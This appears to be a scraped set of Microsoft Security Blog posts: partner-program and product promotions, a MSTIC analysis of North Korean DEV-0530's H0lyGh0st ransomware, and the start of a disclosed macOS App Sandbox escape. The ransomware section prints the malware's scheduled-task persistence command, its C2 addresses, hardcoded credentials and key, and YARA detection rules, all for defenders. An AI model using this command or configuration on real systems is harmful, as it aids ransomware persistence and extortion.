Assisting customers to deploy and fully leverage products they already own is one of the strongest ways our partners can deliver customer value. This week, Microsoft is announcing an entirely new partner investment to help partners drive customer success and product usage. Starting October 1, 2022, partners who help customers deploy their untapped security capabilities within Microsoft 365 E5 and Microsoft Azure will be eligible for up to USD25,000 per account. Microsoft is excited to provide this co-investment to ensure partners remain competitive in their offerings.

Once security products have been deployed, customers often need assistance analyzing and triaging security data to monitor their ecosystem. Microsoft is seeing a surge in organizations looking for a trusted managed detection and response (MDR) partner to help offload time-consuming work and augment their existing in-house security teams. Gartner estimates that 50 percent of organizations will be using MDR services by 2025, and with more than 785,000 customers currently using Microsoft’s advanced security products, the partner opportunity is tremendous. To meet this need, Microsoft has recently announced investments in our managed XDR partner community, including working with them to verify their XDR solutions for use with Microsoft products. Partners with a verified XDR service will have increased access to co-marketing funding to support their business and direct integration with Microsoft field sellers through co-sell opportunities. Partners can learn more about investing in managed XDR partner success.

At Microsoft, we are continually looking for ways to deliver more value with our solutions—and to make it easier for our partners to do the same. For example:

  • Most organizations don’t have IoT security at all, and those that do often need help integrating it into their broader SIEM and XDR programs. Microsoft Defender for IoT positions partners to solve both problems for customers. With new native integration with Microsoft 365 Defender that enables you to see vulnerable IoT devices in the Microsoft 365 Defender console and complete coverage across IoT, enterprise IoT, and operational technology (OT) devices, Defender for IoT can now secure all endpoint types, correlate incidents across the entire kill chain, and provide faster detection and response for attacks that previously may have been left undiscovered.
  • Despite facing similar risks as enterprises, small to medium-sized businesses (SMBs) often lack the same level of resources. Microsoft Defender for Business provides next-generation protection, endpoint detection and response (EDR), threat and vulnerability management, and automated investigation and remediation—all in a cost-effective package that’s easy to implement and use. Server support is now available in preview. Integration with Microsoft 365 Lighthouse and Remote Monitoring and Management (RMM) solutions enable Microsoft Cloud Solution Provider (CSP) partners to build on that value by delivering a fully managed service. Partners can learn more with the Microsoft Defender for Business partner kit.
  • Simplifying the cloud for the public sector and government entities empowers them to accelerate their digital transformation journey. Azure Confidential Computing now helps customers encrypt their data while it’s in use, so trusted partners can now migrate customer applications that handle sensitive data to Azure without rewriting them, and public sector customers can have confidence that their data is protected. And, to empower public sector customers to take advantage of the full power of the cloud while respecting their digital sovereignty, Microsoft Cloud for Sovereignty provides a means to build, move, and operate data and workloads in the cloud while meeting legal, security, and policy requirements.

Recognizing our partners of the year

Microsoft recently announced a simplified and more flexible way to be identified as a Microsoft Security Solution Provider. If you’ve historically been a silver or gold security partner or Enterprise Mobility Management partner, you now have the opportunity this coming year to be recognized through the Microsoft Cloud Partner Program (MCPP) as a security solution partner. 

Once identified, Microsoft offers a wide variety of co-marketing opportunities you can take advantage of in your own programs and in collaboration with Microsoft to differentiate your business, not the least of which is the opportunity to be recognized by Microsoft as the Security or Compliance partner of the year.

I’d like to congratulate Ernst and Young as the 2022 Security Partner of the Year in recognition of the use of the Zero Trust framework that fully leverages Microsoft Azure Active Directory (Azure AD) and Microsoft Azure Key Vault. I’d also like to recognize Edgile as the 2022 Compliance Partner of the Year for their integration of a comprehensive security framework that extends the capabilities of enterprises to also measure the maturity of their data governance. I want to congratulate these partners for their incredible work, as well as all the winners of the 2022 Microsoft Security Excellence Awards. I also want to express my gratitude to our entire partner community for all you do to advance our shared mission of security and to make the world a safer place.

Top takeaways for our partners

Microsoft partners have an amazing opportunity to showcase their security proficiency, drive new growth, and create real-world impact. We invite all our partners to download our commissioned Forrester report to spur ideas on how to differentiate and expand their business. I’ll close with a few ideas:

  • If you don’t have a security practice yet, now is the time! Explore a managed security services practice, such as managed XDR.
  • If you’re already offering your customers security services, you should consider going bigger! Lean into governance, risk management, and compliance and privacy with Microsoft Purview and Microsoft Priva.
  • Bolster security for small and medium-sized businesses with our Microsoft Defender for Business partner kit.

Be sure to check out our sessions at Microsoft Inspire that go deeper into these topics as well:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

1Report: Pretty much every type of cyberattack increased in 2021, Brandon Vigliarolo. February 17, 2022.

2(ISC)² Cybersecurity Workforce Study, (ISC)². 2021.

3Worldwide information security services spending from 2017 to 2022, Justina Alexandra Sava. April 27, 2022.

4Smarter with Gartner, The Top 8 Security and Risk Trends We’re Watching, November 15, 2021.

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

The post How Microsoft Security partners are helping customers do more with less appeared first on Microsoft Security Blog.

Categories: cybersecurity, data governance Tags:

Mitigation for Azure Storage SDK Client-Side Encryption Padding Oracle Vulnerability

July 18th, 2022 No comments

Summary: Google informed Microsoft under Coordinated Vulnerability Disclosure (CVD) of a padding oracle vulnerability that may affect customers using Azure Storage SDK (for Python, .NET, Java) client-side encryption (CVE-2022-30187). To mitigate this vulnerability, we released a new General Availability (GA) version of the Azure Storage SDK client-side encryption feature (v2) on July 12, 2022. Microsoft …

Mitigation for Azure Storage SDK Client-Side Encryption Padding Oracle Vulnerability Read More »

Categories: Uncategorized Tags:

North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware

A group of actors originating from North Korea that Microsoft Threat Intelligence Center (MSTIC) tracks as DEV-0530 has been developing and using ransomware in attacks since June 2021. This group, which calls itself H0lyGh0st, utilizes a ransomware payload with the same name for its campaigns and has successfully compromised small businesses in multiple countries as early as September 2021.

Along with their H0lyGh0st payload, DEV-0530 maintains an .onion site that the group uses to interact with their victims. The group’s standard methodology is to encrypt all files on the target device and use the file extension .h0lyenc, send the victim a sample of the files as proof, and then demand payment in Bitcoin in exchange for restoring access to the files. As part of their extortion tactics, they also threaten to publish victim data on social media or send the data to the victims’ customers if they refuse to pay. This blog is intended to capture part of MSTIC’s analysis of DEV-0530 tactics, present the protections Microsoft has implemented in our security products, and share insights on DEV-0530 and H0lyGh0st ransomware with the broader security community to protect mutual customers.

MSTIC assesses that DEV-0530 has connections with another North Korean-based group tracked as PLUTONIUM (aka DarkSeoul or Andariel). While the use of H0lyGh0st ransomware in campaigns is unique to DEV-0530, MSTIC has observed communications between the two groups, as well as DEV-0530 using tools created exclusively by PLUTONIUM.

As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach high confidence about the origin or identity of the actor behind the activity.

Who is DEV-0530?

DEV-0530 primarily operates ransomware campaigns to pursue financial objectives. In MSTIC’s investigations of their early campaigns, analysts observed that the group’s ransom note included a link to the .onion site hxxp://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd[.]onion, where the attackers claim to “close the gap between the rich and poor”. They also attempt to legitimize their actions by claiming to increase the victim’s security awareness by letting the victims know more about their security posture.

A screenshot of the ransom noted displayed by the H0lyGh0st ransomware. The page has a white background with black text, and presents information on how the ransomware victim can restore their files.
Figure 1. A H0lyGh0st ransom note linked to the attackers’ .onion site.
A screenshot of the H0lyGh0st .onion website. The page has a white background and white text, and presents claims made by the group regarding the motives behind their activities.
Figure 2. DEV-0530 attackers publishing their claims on their website.

Like many other ransomware actors, DEV-0530 notes on their website’s privacy policy that they would not sell or publish their victim’s data if they get paid. But if the victim fails to pay, they would publish everything. A contact form is also available for victims to get in touch with the attackers.

A screenshot from the H0lyGh0st website, presenting two sections in two columns. The column on the left detail their privacy and policy, while the one on the right pertains to their contact information.
Figure 3. Privacy policy and contact us information on the H0lyGh0st website.

Affiliations with other threat actors originating from North Korea

MSTIC assesses there is likely some overlap between DEV-0530 and PLUTONIUM. PLUTONIUM is a North Korean threat actor group affiliated with clusters of activity that are also known as DarkSeoul and Andariel. Active since at least 2014, PLUTONIUM has primarily targeted the energy and defense industries in India, South Korea, and the United States using a variety of tactics and techniques.

MSTIC has observed known DEV-0530 email accounts communicating with known PLUTONIUM attacker accounts. MSTIC has also observed both groups operating from the same infrastructure set, and even using custom malware controllers with similar names.

To further assess the origin of DEV-0530 operations, MSTIC performed a temporal analysis of observed activity from the group. MSTIC estimates that the pattern of life of DEV-0530 activity is most consistent with the UTC+8 and UTC+9 time zones. UTC+9 is the time zone used in North Korea.

Despite these similarities, differences in operational tempo, targeting, and tradecraft suggest DEV-0530 and PLUTONIUM are distinct groups.

Why are North Korean actors using ransomware?

Based on geopolitical observations by global experts on North Korean affairs and circumstantial observations, Microsoft analysts assess the use of ransomware by North Korea-based actors is likely motivated by two possible objectives.  

The first possibility is that the North Korean government sponsors this activity. The weakened North Korean economy has become weaker since 2016 due to sanctions, natural disasters, drought, and the North Korean government’s COVID-19 lockdown from the outside world since early 2020. To offset the losses from these economic setbacks, the North Korean government could have sponsored cyber actors stealing from banks and cryptocurrency wallets for more than five years. If the North Korean government is ordering these ransomware attacks, then the attacks would be yet another tactic the government has enabled to offset financial losses.

However, state-sponsored activity against cryptocurrency organizations has typically targeted a much broader set of victims than observed in DEV-0530 victimology. Because of this, it is equally possible that the North Korean government is not enabling or supporting these ransomware attacks. Individuals with ties to PLUTONIUM infrastructure and tools could be moonlighting for personal gain. This moonlighting theory might explain the often-random selection of victims targeted by DEV-0530.

Although Microsoft cannot be certain of DEV-0530’s motivations, the impact of these ransomware attacks on our customers raises the importance of exposing the underlying tactics and techniques, detecting and preventing attacks in our security products, and sharing our knowledge with the security ecosystem.

Ransomware developed by DEV-0530

Between June 2021 and May 2022, MSTIC classified H0lyGh0st ransomware under two new malware families: SiennaPurple and SiennaBlue. Both were developed and used by DEV-0530 in campaigns. MSTIC identified four variants under these families – BTLC_C.exe, HolyRS.exe, HolyLock.exe, and BLTC.exe – and clustered them based on code similarity, C2 infrastructure including C2 URL patterns, and ransom note text. BTLC_C.exe is written in C++ and is classified as SiennaPurple, while the rest are written in Go, and all variants are compiled into .exe to target Windows systems. Microsoft Defender Antivirus, which is built into and ships with Windows 10 and 11, detects and blocks BTLC_C.exe as SiennaPurple and the rest as SiennaBlue, providing protection for Windows users against all known variants the H0lyGh0st malware..

A timeline of the payloads used by DEV-0530 over time, SiennaPurple and SiennaBlue. The timeline covers developments from May 2021 to June 2022, with SiennaPurple being used from May to October 2021, and SiennaBlue from September 2021 to June 2022 and beyond.
Figure 4. Timeline of DEV-0530 ransomware payloads.

SiennaPurple ransomware family: BTLC_C.exe

BLTC_C.exe is a portable ransomware developed by DEV-0530 and was first seen in June 2021. This ransomware doesn’t have many features compared to all malware variants in the SiennaBlue family. Prominently, if not launched as an administrative user, the BLTC_C.exe malware displays the following hardcoded error before exiting:

"This program only execute under admin privilege".

The malware uses a simple obfuscation method for strings where 0x30 is subtracted from the hex value of each character, such that the string “aic^ef^bi^abc0” is decoded to 193[.]56[.]29[.]123. The indicators of compromise (IOCs) decoded from the BLTC_C.exe ransomware are consistent with all malware variants in the SiennaBlue family, including the C2 infrastructure and the HTTP beacon URL structure access.php?order=AccessRequest&cmn. The BTLC_C.exe sample analyzed by MSTIC has the following PDB path: M:\ForOP\attack(utils)\attack tools\Backdoor\powershell\btlc_C\Release\btlc_C.pdb.

SiennaBlue ransomware family: HolyRS.exe, HolyLocker.exe, and BTLC.exe

Between October 2021 and May 2022, MSTIC observed a cluster of new DEV-0530 ransomware variants written in Go. We classified these variants as SiennaBlue. While new Go functions were added to the different variants over time, all the ransomware in the SiennaBlue family share the same core Go functions.

A deeper look into the Go functions used in the SiennaBlue ransomware showed that over time, the core functionality expanded to include features like various encryption options, string obfuscation, public key management, and support for the internet and intranet. The table below demonstrates this expansion by comparing the Go functions in HolyRS.exe and BTLC.exe:

HolyRS.exe [2021] BTLC.exe [2022]

main_DisableNetworkDevice main_encryptString

MSTIC assesses DEV-0530 successfully compromised several targets in multiple countries using HolyRS.exe in November 2021. A review of the victims showed they were primarily small-to-midsized businesses, including manufacturing organizations, banks, schools, and event and meeting planning companies. The victimology indicates that these victims are most likely targets of opportunity. MSTIC suspects that DEV-0530 might have exploited vulnerabilities such as CVE-2022-26352 (DotCMS remote code execution vulnerability) on public-facing web applications and content management systems to gain initial access into target networks. The SiennaBlue malware variants were then dropped and executed. To date, MSTIC has not observed DEV-0530 using any 0-day exploits in their attacks.

After successfully compromising a network, DEV-0530 exfiltrated a full copy of the victims’ files. Next, the attackers encrypted the contents of the victim device, replacing all file names with Base64-encoded versions of the file names and renaming the extension to .h0lyenc. Victims found a ransom note in C:\FOR_DECRYPT.html, as well as an email from the attackers with subject lines such as:

!!!!We are < H0lyGh0st>. Please Read me!!!!

As seen in the screenshot below, the email from the attackers let the victim know that the group has stolen and encrypted all their files. The email also included a link to a sample of the stolen data to prove their claim, in addition to the demand for payment for recovering the files.

A screenshot of the email sent by DEV-0530 as a ransom note to their targets. The email message tells the target to pay in order to recover their files. It also mentions a URL where they can access some of their data.
Figure 5. Ransom note left by DEV-0530 attackers.

BTLC.exe is the latest DEV-0530 ransomware variant and has been seen in the wild since April 2022. BTLC.exe can be configured to connect to a network share using the default username, password, and intranet URL hardcoded in the malware if the ServerBaseURL is not accessible from the device. One notable feature added to BTLC.exe is a persistence mechanism in which the malware creates or deletes a scheduled task called lockertask, such that the following command line syntax can be used to launch the ransomware:

cmd.exe /Q /c schtasks /create /tn lockertask /tr [File] /sc minute /mo 1 /F /ru system 1> \\\ADMIN$\__[randomnumber] 2>&1

Once the ransomware is successfully launched as an administrator, it tries to connect to the default ServerBaseURL hardcoded in the malware, attempts to upload a public key to the C2 server, and encrypts all files in the victim’s drive.

HolyRS.exe/HolyLocker.exe C2 configuration BTLC.exe C2 configuration
main_ServerBaseURL: hxxp://193[.]56[.]29[.]123:8888
main_IntranetURL: 10[.]10[.]3[.]42
main_Username: adm-karsair  
EncryptionKey: H0lyGh0stKey1234
IntranetUrl: 192[.]168[.]168[.]5
Username: atrismsp Scheduledtask name: lockertask
A screenshot of assembly code presenting configuration information used by the malware to connect to its C2 server. The code includes the C2 URL, as well as the attacker's username.
Figure 6. BTLC.exe C2 communication

Based on our investigation, the attackers frequently asked victims for anywhere from 1.2 to 5 Bitcoins. However, the attackers were usually willing to negotiate and, in some cases, lowered the price to less than one-third of the initial asking price. As of early July 2022, a review of the attackers’ wallet transactions shows that they have not successfully extorted ransom payments from their victims.

A screenshot from a Bitcoin explorer page presenting information on the attackers' Bitcoin wallet. The page shows that the Bitcoin wallet is empty.
Figure 7. Screenshot of DEV-0530 attackers’ wallet

HolyRS.exe/BTLC.exe C2 URL pattern:

  • hxxp://193[.]56[.]29[.]123:8888/access.php?order=GetPubkey&cmn=[Victim_HostName]
  • hxxp://193[.]56[.]29[.]123:8888/access.php?order=golc_key_add&cmn=[Victim_HostName]&type=1
  • hxxp://193[.]56[.]29[.]123:8888/access.php?order=golc_key_add&cmn=[Victim_HostName]&type=2
  • hxxp://193[.]56[.]29[.]123:8888/access.php?order=golc_finish&cmn=[Victim_HostName]&

Examples of HolyRS.exe/BTLC.exe ransom note metadata:

Attacker email address: H0lyGh0st@mail2tor[.]com
Image location: hxxps://cloud-ex42[.]usaupload[.]com/cache/plugins/filepreviewer/219002/f44c6929994386ac2ae18b93f8270ec9ff8420d528c9e35a878efaa2d38fb94c/1100x800_cropped.jpg
Report URL: hxxp://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd[.]onion

Microsoft will continue to monitor DEV-0530 activity and implement protections for our customers. The current detections, advanced detections, and indicators of compromise (IOCs) in place across our security products are detailed below.

Recommended customer actions

Microsoft has implemented protections to detect these malware families as SiennaPurple and SiennaBlue (e.g., ALF:Ransom:Win32/SiennaBlue.A) via Microsoft Defender Antivirus and Microsoft Defender for Endpoint, wherever these are deployed on-premises and in cloud environments.

Microsoft encourages all organizations to proactively implement and frequently validate a data backup and restore plan as part of broader protection against ransomware and extortion threats.

The techniques used by DEV-0530 in H0lyGh0st activity can be mitigated by adopting the security considerations provided below:

  • Use the included IOCs to investigate whether they exist in your environment and assess for potential intrusion.

Our blog on the ransomware-as-a-service economy has an exhaustive guide on how to protecting against ransomware threats. We encourage readers to refer to that blog for a comprehensive guide that has a deep dive into each of the following areas:

For small or midsize companies who use Microsoft Defender for Business or Microsoft 365 Business Premium, enabling each of the features below will provide a protective layer against these threats where applicable. For Microsoft 365 Defender customers, the following checklist eliminates security blind spots:

  • Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.
  • Turn on tamper protection features to prevent attackers from stopping security services.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.
  • Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.
  • Use device discovery to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.
  • Protect user identities and credentials using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.

Indicators of compromise

This list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.

Indicator Type Description
99fc54786a72f32fd44c7391c2171ca31e72ca52725c68e2dde94d04c286fccd SHA-256 Hash of BTLC_C.exe
f8fc2445a9814ca8cf48a979bff7f182d6538f4d1ff438cf259268e8b4b76f86 SHA-256 Hash of HolyRS.exe
bea866b327a2dc2aa104b7ad7307008919c06620771ec3715a059e675d9f40af SHA-256 Hash of BTLC.exe
cmd.exe /Q /c schtasks /create /tn lockertask /tr [File] /sc minute /mo 1 /F /ru system 1> \\\ADMIN$\__[randomnumber] 2>&1   Command line Example of new ScheduledTask to BTLC.exe
193[.]56[.]29[.]123 C2 C2 IP address
H0lyGh0st@mail2tor[.]com Email Ransomware payment communication address
C:\FOR_DECRYPT.html File path File path of ransom note

NOTE: These indicators should not be considered exhaustive for this observed activity.

Microsoft 365 detections

Microsoft Defender Antivirus

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint customers may see any or a combination of the following alerts as an indication of possible attack.

  • DEV-0530 activity group
  • Ransomware behavior detected in the file system
  • Possible ransomware infection modifying multiple files
  • Possible ransomware activity

Advanced hunting queries

Microsoft Sentinel

To locate possible DEV-0530 activity mentioned in this blog post, Microsoft Sentinel customers can use the queries detailed below:

Identify DEV-0530  IOCs

This query identifies a match based on IOCs related to DEV-0530 across various Sentinel data feeds:

Identify renamed file extension

DEV-0530 actors are known to encrypt the contents of the victim’s device as well as rename the file and extension. The following query detects the creation of files with .h0lyenc extension:

Identify Microsoft Defender Antivirus detection related to DEV-0530

This query looks for Microsoft Defender AV detections related to DEV-0530 and joins the alert with other data sources to surface additional information such as device, IP, signed-in on users, etc.

Yara rules

rule SiennaPurple 
        	author = "Microsoft Threat Intelligence Center (MSTIC)" 
		description = "Detects PDB path, C2, and ransom note in DEV-0530 Ransomware SiennaPurple samples" 
		hash = "99fc54786a72f32fd44c7391c2171ca31e72ca52725c68e2dde94d04c286fccd" 
		$s1 = "ForOP\\attack(utils)\\attack tools\\Backdoor\\powershell\\btlc_C\\Release\\btlc_C.pdb" 
		$s2 = "matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd.onion"
		$s3 = ""
		$s4 = "We are <HolyGhost>. All your important files are stored and encrypted."
		$s5 = "aic^ef^bi^abc0"
		$s6 = "---------------------------3819074751749789153841466081"

		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 
		filesize < 7MB and filesize > 1MB and 
		all of ($s*) 
rule SiennaBlue 
		author = "Microsoft Threat Intelligence Center (MSTIC)" 
		description = "Detects Golang package, function, and source file names observed in DEV-0530 Ransomware SiennaBlue samples" 
		hash1 = "f8fc2445a9814ca8cf48a979bff7f182d6538f4d1ff438cf259268e8b4b76f86" 
		hash2 = "541825cb652606c2ea12fd25a842a8b3456d025841c3a7f563655ef77bb67219
		$holylocker_s1 = "C:/Users/user/Downloads/development/src/HolyLocker/Main/HolyLock/locker.go"
		$holylocker_s2 = "HolyLocker/Main.EncryptionExtension"
		$holylocker_s3 = "HolyLocker/Main.ContactEmail"
		$holylocker_s4 = "HolyLocker/communication.(*Client).GetPubkeyFromServer"
		$holylocker_s5 = "HolyLocker/communication.(*Client).AddNewKeyPairToIntranet"
		$holyrs_s1 = "C:/Users/user/Downloads/development/src/HolyGhostProject/MainFunc/HolyRS/HolyRS.go"
		$holyrs_s2 = "HolyGhostProject/MainFunc.ContactEmail"
		$holyrs_s3 = "HolyGhostProject/MainFunc.EncryptionExtension"
		$holyrs_s4 = "HolyGhostProject/Network.(*Client).GetPubkeyFromServer"
		$holyrs_s5 = "HolyGhostProject/Network.(*Client).AddNewKeyPairToIntranet"
		$s1 = "Our site : <b><a href=%s>H0lyGh0stWebsite"
		$s2 = ".h0lyenc"
		$go_prefix = "Go build ID:"
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 
		filesize < 7MB and filesize > 1MB and 
		$go_prefix and all of ($s*) and (all of ($holylocker_*) or all of ($holygrs_*))

The post North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware appeared first on Microsoft Security Blog.

Microsoft recognized as a Leader in UEM Software 2022 IDC MarketScape reports

July 13th, 2022 No comments

Competition for talent has increased pressure to lead in the digital space, and business decisions now weigh user experience for employees heavily among costs and benefits. Workers insist on experiences that mirror their personal experiences, often on their own devices. As enterprise computing has expanded beyond the cubicle, the need to manage the ensuing explosion of complexity, especially when it comes to device security, has raised the bar for technology and information business decision-makers.

Microsoft has heard consistently that meeting these expanding needs with limited resources is job one. As new solutions seem to emerge as rapidly as the problem itself expands, providing a consistent, proven, centralized portal for endpoint management is how Microsoft aims to be the partner of choice in this space.

The scale of Microsoft—and our investments in endpoint management and endpoint security—affords our customers peace of mind that our solutions will continue to evolve alongside the demands and threats they face. We deliver advanced end-to-end cross-cloud, cross-platform security solutions, which integrate more than 50 different categories across security, compliance, identity, device management, and privacy, informed by more than 24 trillion threat signals we see each day. Proof of customers’ trust and peace of mind: the Microsoft Security business grew more than 45 percent year-over-year, totaling USD15 billion of annual revenue.1

In-person meeting with a masked woman and a man discussing the information shared on screen showing the Microsoft Endpoint Manager admin center All Devices of the endpoints managed from the cloud.

This scale also allows Microsoft to bring a unified endpoint management solution that is tailored for customers’ challenges, especially the transformation to cloud management. Microsoft is recognized as a Leader in the Unified Endpoint Management Software 2022 Vendor Assessment IDC MarketScape report, including Ruggedized/Internet of Things Device Deployments and Small and Midsize Businesses. Microsoft Endpoint Manager is an integrated solution that simplifies management across multiple operating systems, cloud, on-premises, mobile, desktop, and virtualized endpoints.

This quote from the report may be of special interest to customers trying to do more with less:

Integration is a key aspect of the Microsoft Endpoint Manager offering, and the product ties into a wide range of other tools from the vendor, including Office 365 apps, Teams, and OneDrive as well as Microsoft security products including Microsoft Defender for Endpoint (endpoint security) and Microsoft Sentinel (security information and event management).” 

Managing more platforms

In short, IT administrators get more done in one place, with simplified management of multiple operating systems, cloud, on-premises, mobile, desktop, and virtualized endpoints. The IDC MarketScape report calls out the topic of enterprise management for macOS endpoints: 

[Microsoft Endpoint Manager] includes the ability to apply granular policies to Mac software distribution and deployments, broader support for macOS device configuration profiles, and user-based policy enforcement customization.

In 2022, we will further expand across platforms by releasing enhanced support for devices running Android Open Source Project (AOSP), such as Oculus virtual reality (VR) headsets, as well as enable conditional access policies and device settings for Linux desktops. This way, IT can protect data on any devices by securing user apps; configuring, securing, monitoring, and updating apps remotely; and reducing risks with the combination of identity-based management and Microsoft Security.

User-focused experiences

We hear from customers that powerful software is great, but a frictionless experience is better. We try to bring this learning into our product development and continue working to improve not just what control IT admins have over endpoints, but also how they interact with them. How can data be turned into insights? How does portfolio visibility contribute to security?

We understand, too, that users are vested stakeholders in the process, and their satisfaction often determines whether IT can notch up a win or not. Access policies that are too strict can frustrate users or lead to insecure workarounds and require a balance of security and usability. We know that the line between home and work is blurred—so too is the line between business and personal devices—we try to improve on the ways we can help users do their work where and how they want.

IDC MarketScape report also recognizes our focus on endpoint analytics that are designed to make suggestions instead of presenting data, and flag anomalies in the continuous stream of health, compliance, and security signals. When an IT admin can take proactive steps instead of making reactive fixes, we notch up a win for everyone.

The improved experience is well described by Grupo Bancolombia, who adopted Endpoint Manager for more flexibility to support employees in the cloud so they can work from anywhere in a secure way. Read the case study to learn more.

This quote from Santiago Santacruz Pareja, Grupo Bancolombia IT Infrastructure Engineer, encapsulates the improved experience for users and IT pros:

We quickly rolled out BitLocker to 23,000 machines, but the best part was that it was invisible to employees—they didn’t notice any changes to their device or daily work, and we succeeded in protecting their data.

Learn more

You’re invited to read the full report or view a snapshot of the IDC MarketScape report below. Keep up with ongoing developments on Unified Endpoint Management (UEM) by visiting the Microsoft Endpoint Manager Tech Community blog and exploring Microsoft Endpoint Manager.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

We thank our customers and partners for being on this journey with us.

Positioning of the IDC MarketScape of worldwide software vendors across Capabilities and Strategies for Unified Endpoint Management. Categories include participants, contenders, major players and leaders with Microsoft showing as a leader ahead of Vmware in Strategies.

IDC MarketScape: Worldwide Unified Endpoint Management Software 2022 Vendor Assessment, Doc #US48325122, May 2022.

1Microsoft Fiscal Year 2022 Second Quarter Earnings Conference Call, Microsoft. January 25, 2022.

The post Microsoft recognized as a Leader in UEM Software 2022 IDC MarketScape reports appeared first on Microsoft Security Blog.

Uncovering a macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706

July 13th, 2022 No comments

Microsoft uncovered a vulnerability in macOS that could allow specially crafted codes to escape the App Sandbox and run unrestricted on the system. We shared these findings with Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR) in October 2021. A fix for this vulnerability, now identified as CVE-2022-26706, was included in the security updates released by Apple on May 16, 2022. Microsoft shares the vulnerability disclosure credit with another researcher, Arsenii Kostromin (0x3c3e), who discovered a similar technique independently.

We encourage macOS users to install these security updates as soon as possible. We also want to thank the Apple product security team for their responsiveness in fixing this issue.

The App Sandbox is Apple’s access control technology that application developers must adopt to distribute their apps through the Mac App Store. Essentially, an app’s processes are enforced with customizable rules, such as the ability to read or write specific files. The App Sandbox also restricts the processes’ access to system resources and user data to minimize the impact or damage if the app becomes compromised. However, we found that specially crafted codes could bypass these rules. An attacker could take advantage of this sandbox escape vulnerability to gain elevated privileges on the affected device or execute malicious commands like installing additional payloads.

We found the vulnerability while researching potential ways to run and detect malicious macros in Microsoft Office on macOS. For backward compatibility, Microsoft Word can read or write files with an “~$” prefix. Our findings revealed that it was possible to escape the sandbox by leveraging macOS’s Launch Services to run an open –stdin command on a specially crafted Python file with the said prefix.

Our research shows that even the built-in, baseline security features in macOS could still be bypassed, potentially compromising system and user data. Therefore, collaboration between vulnerability researchers, software vendors, and the larger security community remains crucial to helping secure the overall user experience. This includes responsibly disclosing vulnerabilities to vendors.

In addition, insights from this case study not only enhance our protection technologies, such as Microsoft Defender for Endpoint, but they also help strengthen the security strategies of software vendors and the computing landscape at large. This blog post thus provides details of our research and overviews of similar sandbox escape vulnerabilities reported by other security researchers that helped enrich our analysis.

How macOS App Sandbox works

In a nutshell, macOS apps can specify sandbox rules for the operating system to enforce on themselves. The App Sandbox restricts system calls to an allowed subset, and the said system calls can be allowed or disallowed based on files, objects, and arguments. Simply put, the sandbox rules are a defense-in-depth mechanism that dictates the kind of operations an application can or can’t do, regardless of the type of user running it. Examples of such operations include:

  • the kind of files an application can or can’t read or write;
  • whether the application can access specific resources such as the camera or the microphone, and;
  • whether the application is allowed to perform inbound or outbound network connections.
Diagram comparing how user data and system resources access an app without and with App Sandbox. 

Without App Sandbox, all user data and system resources will have unrestricted access to the app.

With App Sandbox, only the data and resources confined within the said sandbox will have unrestricted access to the app. All other user data and resources won't have access.
Figure 1. Illustration of a sandboxed app, from the App Sandbox documentation (photo credit: Apple)

Therefore, the App Sandbox is a useful tool for all macOS developers in providing baseline security for their applications, especially for those that have large attack surfaces and run user-provided code. One example of these applications is Microsoft Office.

Sandboxing Microsoft Office in macOS

Attackers have targeted Microsoft Office in their attempts to gain a foothold on devices and networks. One of their techniques is abusing Office macros, which they use in social engineering attacks to trick users into downloading malware and other payloads.

On Windows systems, Microsoft Defender Application Guard for Office helps secure Microsoft Office against such macro abuse by isolating the host environment using Hyper-V. With this feature enabled, an attacker must first be equipped with a Hyper-V guest-to-host vulnerability to affect the host system—a very high bar compared to simply running a macro. Without a similar isolation technology and default setting on macOS, Office must rely on the operating system’s existing mitigation strategies. Currently, the most promising technology is the macOS App Sandbox.

Viewing the Microsoft sandbox rules is quite straightforward with the codesign utility. Figure 2 below shows the truncated sandbox rules for Microsoft Word:

Partial screenshot of a command line interface showing different keys and values related to the App Sandbox rules for Microsoft Word in macOS.
Figure 2. Viewing the Microsoft Word sandbox rules with the codesign utility

One of the rules dictates the kind of files the application is allowed to read or write. As seen in the screenshot of the syntax below, Word is allowed to read or write files with filenames that start with the “~$” prefix. The reason for this rule is rooted in the way Office works internally and remains intact for backward compatibility.

One of the rules dictates the kind of files the application is allowed to read or write. As seen in the screenshot of the syntax below, Word is allowed to read or write files with filenames that start with the “~$” prefix. The reason for this rule is rooted in the way Office works internally and remains intact for backward compatibility.

Partial screenshot of a command line interface showing the read/write App Sandbox rule for Microsoft Word in macOS.
Figure 3. File read and write sandbox rule for Microsoft Word

